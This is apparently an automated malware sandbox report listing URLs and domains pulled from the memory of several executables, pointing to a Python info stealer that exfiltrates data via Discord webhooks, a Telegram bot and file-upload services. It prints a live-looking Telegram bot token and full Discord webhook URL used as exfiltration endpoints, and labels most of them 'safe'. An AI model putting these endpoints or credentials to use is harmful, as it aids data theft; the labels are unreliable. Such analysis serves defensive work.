Source	Detection	Scanner	Label
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	0%	URL Reputation	safe
https://www.avito.ru/	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://www.python.org/download/releases/2.3/mro/.	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
https://www.leboncoin.fr/	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
https://tools.ietf.org/html/rfc2388#section-4.4	0%	URL Reputation	safe
https://account.bellmedia.c	0%	URL Reputation	safe
https://weibo.com/	0%	URL Reputation	safe
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	0%	URL Reputation	safe
https://login.microsoftonline.com	0%	URL Reputation	safe
http://crl.thawte.com/ThawteTimestampingCA.crl0	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://www.msn.com	0%	URL Reputation	safe
https://www.amazon.ca/	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
https://www.amazon.com/	0%	URL Reputation	safe
https://httpbin.org/	0%	URL Reputation	safe
http://google.com/	0%	Avira URL Cloud	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://www.wykop.pl/	0%	URL Reputation	safe
https://twitter.com/	0%	URL Reputation	safe
https://api.telegram.org/bot%s/%s	0%	Avira URL Cloud	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://www.olx.pl/	0%	URL Reputation	safe
https://support.mozilla.org/products/firefox	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://discordapp.com/api/v9/users/	0%	Avira URL Cloud	safe
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	0%	URL Reputation	safe
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	0%	Avira URL Cloud	safe
https://github.com/urllib3/urllib3/issues/2920	0%	Avira URL Cloud	safe
https://github.com/Blank-c/BlankOBF	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://MD8.mozilla.org/1/m	0%	URL Reputation	safe
https://yahoo.com/	0%	Avira URL Cloud	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://bugzilla.mo	0%	URL Reputation	safe
https://python.org/dev/peps/pep-0263/	0%	Avira URL Cloud	safe
http://tools.ietf.org/html/rfc6125#section-6.4.3	0%	URL Reputation	safe
https://www.amazon.fr/	0%	URL Reputation	safe
https://www.openssl.org/H	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://www.amazon.de/	0%	URL Reputation	safe
http://ip-api.com/line/?fields=hosting	0%	URL Reputation	safe
https://api.anonfiles.com/upload	0%	Avira URL Cloud	safe
https://api.gofile.io/getServerr;r	0%	Avira URL Cloud	safe
https://www.zhihu.com/	0%	Avira URL Cloud	safe
https://html.spec.whatwg.org/multipage/	0%	Avira URL Cloud	safe
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.pngz	0%	Avira URL Cloud	safe
http://cacerts.digicert.co	0%	Avira URL Cloud	safe
https://discord.com/api/v9/users/	0%	Avira URL Cloud	safe
https://www.rfc-editor.org/rfc/rfc8259#section-8.1	0%	Avira URL Cloud	safe
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	0%	Avira URL Cloud	safe
http://www.iana.org/time-zones/repository/tz-link.html	0%	Avira URL Cloud	safe
https://api.gofile.io/getServer	0%	Avira URL Cloud	safe
https://api.telegram.org/bot7006262545:AAG_Oybxah5yJgAPFw9HTnZfJtepO5xBob8/sendDocument	0%	Avira URL Cloud	safe
http://json.org	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	0%	Avira URL Cloud	safe
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	0%	Avira URL Cloud	safe
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	0%	Avira URL Cloud	safe
https://www.amazon.co.uk/	0%	Avira URL Cloud	safe
https://api.gofile.io/getServerr;	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningse=Lax0	0%	Avira URL Cloud	safe
https://www.python.org/dev/peps/pep-0205/	0%	Avira URL Cloud	safe
http://cacerts.digicert.coH	0%	Avira URL Cloud	safe
https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2	0%	Avira URL Cloud	safe
https://google.com/	0%	Avira URL Cloud	safe
http://www.cl.cam.ac.uk/~mgk25/iso-time.html	0%	Avira URL Cloud	safe
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	0%	Avira URL Cloud	safe
http://google.com/mail/	0%	Avira URL Cloud	safe
https://google.com/mail/	0%	Avira URL Cloud	safe
https://github.com/urllib3/urllib3/issues/2920S	0%	Avira URL Cloud	safe
https://raw.git	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.png	0%	Avira URL Cloud	safe
https://www.google.com/complete/	0%	Avira URL Cloud	safe
https://api.anonfiles.com/uploadrU	0%	Avira URL Cloud	safe
http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);	0%	Avira URL Cloud	safe
https://google.com/mail	0%	Avira URL Cloud	safe
https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2tsN2CAivzv3lJ-Ow3IUya	0%	Avira URL Cloud	safe
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	0%	Avira URL Cloud	safe
http://ip-api.com/json/?fields=225545	0%	Avira URL Cloud	safe
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm	0%	Avira URL Cloud	safe
https://www.google.com/	0%	Avira URL Cloud	safe
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	0%	Avira URL Cloud	safe
https://foss.heptapod.net/pypy/pypy/-/issues/3539	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
discord.com	162.159.138.232	true	true	unknown
ip-api.com	208.95.112.1	true	false	unknown
api.telegram.org	149.154.167.220	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot7006262545:AAG_Oybxah5yJgAPFw9HTnZfJtepO5xBob8/sendDocument	false	Avira URL Cloud: safe	unknown
https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2tsN2CAivzv3lJ-Ow3IUya	true	Avira URL Cloud: safe	unknown
http://ip-api.com/json/?fields=225545	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://google.com/	based.exe, 00000008.00000002.2378287344.00000273ED06B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Blank-c/BlankOBF	based.exe, 00000008.00000003.1751478048.00000273ED2C1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1751208630.00000273ED49F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1752076948.00000273ED2E4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1753162300.00000273ED2E7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	based.exe, 00000008.00000003.1854346088.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868467332.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot%s/%s	based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.avito.ru/	based.exe, 00000008.00000002.2381451502.00000273EDC38000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.python.org/download/releases/2.3/mro/.	VaTlw2kNGc.exe, 00000001.00000002.1717549435.000001A220AD0000.00000004.00001000.00020000.00000000.sdmp, hacn.exe, 00000007.00000002.1749563307.000001A052178000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2378472989.00000273ED090000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://discordapp.com/api/v9/users/	based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://python.org/dev/peps/pep-0263/	hacn.exe, 00000007.00000002.1750856272.00007FFDFB78F000.00000002.00000001.01000000.0000000E.sdmp, based.exe, 00000008.00000002.2433044590.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	VaTlw2kNGc.exe, 00000001.00000003.1713356841.000001A21EEF4000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713108881.000001A21EED7000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1714275067.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713161017.000001A21EEF2000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713836051.000001A21EEF4000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1709067914.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1714582569.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708290049.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708854333.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000002.1717458875.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708560343.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746827387.000001A050086000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744809631.000001A050084000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1747074153.000001A050095000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000002.1748140847.000001A050099000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746475062.000001A0500BF000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746394971.000001A0500BA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744875342.000001A0500B8000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744645445.000001A050070000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1747169873.000001A0500C3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/urllib3/urllib3/issues/2920	based.exe, 00000008.00000002.2379592577.00000273ED5B4000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	based.exe, 00000008.00000003.2259259730.00000273ED8F8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2259677546.00000273EDA49000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.leboncoin.fr/	based.exe, 00000008.00000002.2381451502.00000273EDC74000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://yahoo.com/	based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319649761.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1852165022.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379742963.00000273ED760000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1874644333.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379386136.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2371538109.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868913203.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319744738.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376496051.00000273ED40E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2370626302.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1787886162.00000273ED46D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379225122.00000273ED412000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tools.ietf.org/html/rfc2388#section-4.4	based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://account.bellmedia.c	based.exe, 00000008.00000002.2383767795.00000273EE538000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://weibo.com/	based.exe, 00000008.00000002.2381451502.00000273EDCB4000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2381451502.00000273EDC84000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.anonfiles.com/upload	based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376496051.00000273ED40E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379225122.00000273ED412000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.gofile.io/getServerr;r	based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com	based.exe, 00000008.00000002.2383767795.00000273EE52C000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2381451502.00000273EDC84000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://cacerts.digicert.co	hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://html.spec.whatwg.org/multipage/	based.exe, 00000008.00000002.2378782526.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2354206883.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1909237453.00000273ED2A0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings	based.exe, 00000008.00000002.2381267066.00000273EDAE0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379479019.00000273ED490000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.zhihu.com/	based.exe, 00000008.00000002.2381451502.00000273EDCB4000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2381451502.00000273EDC84000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	based.exe, 00000008.00000003.2259677546.00000273EDA25000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com	based.exe, 00000008.00000002.2383767795.00000273EE538000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.rfc-editor.org/rfc/rfc8259#section-8.1	based.exe, 00000008.00000003.2319649761.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1852165022.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1874644333.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379386136.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2371538109.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868913203.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319744738.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2370626302.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1787886162.00000273ED46D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.pngz	based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/v9/users/	based.exe, 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	based.exe, 00000008.00000002.2379479019.00000273ED490000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.iana.org/time-zones/repository/tz-link.html	based.exe, 00000008.00000003.1753993526.00000273ED39F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1753857795.00000273ED3A0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.ca/	based.exe, 00000008.00000002.2381451502.00000273EDC6C000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.gofile.io/getServer	based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://json.org	based.exe, 00000008.00000003.2376068056.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	based.exe, 00000008.00000002.2379592577.00000273ED5B4000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	VaTlw2kNGc.exe, 00000001.00000002.1717549435.000001A220B58000.00000004.00001000.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1709067914.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708290049.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708854333.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708560343.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000002.1748492866.000001A051C7C000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377891389.00000273EC858000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.co.uk/	based.exe, 00000008.00000002.2381451502.00000273EDC6C000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	VaTlw2kNGc.exe, 00000001.00000003.1713356841.000001A21EEF4000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713108881.000001A21EED7000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1714275067.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713161017.000001A21EEF2000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713836051.000001A21EEF4000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1709067914.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1714582569.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708290049.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708854333.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000002.1717458875.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708560343.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746827387.000001A050086000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744809631.000001A050084000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1747074153.000001A050095000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000002.1748140847.000001A050099000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746475062.000001A0500BF000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746394971.000001A0500BA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744875342.000001A0500B8000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744645445.000001A050070000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1747169873.000001A0500C3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/	based.exe, 00000008.00000002.2381451502.00000273EDC6C000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.gofile.io/getServerr;	based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://httpbin.org/	based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningse=Lax0	based.exe, 00000008.00000002.2381267066.00000273EDAE0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.python.org/dev/peps/pep-0205/	VaTlw2kNGc.exe, 00000000.00000003.1701929834.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726830017.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1729314570.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.cl.cam.ac.uk/~mgk25/iso-time.html	based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1753857795.00000273ED3A0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	based.exe, 00000008.00000003.2258916763.00000273ED8FD000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2259677546.00000273EDA49000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.wykop.pl/	based.exe, 00000008.00000002.2381451502.00000273EDC38000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
